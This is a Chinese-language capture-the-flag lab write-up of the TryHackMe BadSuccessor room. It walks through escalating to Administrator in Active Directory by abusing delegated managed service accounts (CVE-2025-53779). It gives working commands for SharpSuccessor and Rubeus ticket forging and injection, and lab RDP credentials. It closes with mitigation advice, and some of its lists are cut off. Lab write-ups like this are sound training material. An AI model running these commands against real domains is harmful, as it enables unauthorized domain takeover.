一个涵盖使用 Windows 进行 CVE-2025-53779 漏洞利用的 TryHackme 房间
在本房间中,我们探讨 BadSuccessor 权限提升技术,这是一种滥用 Active Directory 中委托托管服务帐户(dMSA)的漏洞。该攻击允许对 dMSA 对象具有足够控制权的用户模拟另一个帐户,并有可能获得域管理员权限。
房间: https://tryhackme.com/room/adbadsuccessor
难度: 中等
日期: 05/06/2026
版本: 1.0
目标: 演示如何滥用委托托管服务帐户来提升权限并入侵 Active Directory 环境。
角色: Terry Byte (tbyte)
目标: 评估新部署的 Active Directory 环境的安全性,并确定其是否易受 BadSuccessor 攻击。
该攻击由两个主要阶段组成:
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
移动到概念验证目录:
cd C:\PoC
验证内容:dir
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
notepad Get-BadSuccessorOUPermissions.ps1
.\Get-BadSuccessorOUPermissions.ps1
使用 SharpSuccessor 创建一个模拟 Administrator 帐户的委托托管服务帐户:
.\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
会发生什么?
使用 Rubeus 获取委托票据授予票据(TGT):
.\Rubeus.exe tgtdeleg /nowrap
该命令返回一个 Base64 编码的 Kerberos 票据。
复制生成的票据。
.\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
结果:
一个新的 Kerberos 票据被注入到内存中,用于该 dMSA 帐户。
利用 dMSA 票据获取对在 Administrator 上下文下运行的服务的访问权限:
.\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
结果:
dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
读取存储在 Administrator 桌面上的 flag:
Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
成功获取 Flag。
BadSuccessor 演示了委托托管服务帐户如何在 Active Directory 环境中引入权限提升路径。Active Directory 是许多组织的身份骨干,影响 Kerberos 和帐户委派的漏洞可能造成严重后果。
对 dMSA 对象拥有足够权限的攻击者可以:
为缓解 BadSuccessor(CVE-2025-53779),组织应及时应用 Microsoft 的安全更新,限制并审查 dMSA 权限,监控可疑的 Kerberos 活动,审计委派关系,并遵循最小权限原则。定期审查 Active Directory 委派设置有助于识别并减少潜在的权限提升路径。
本房间提供了以下方面的宝贵实操经验: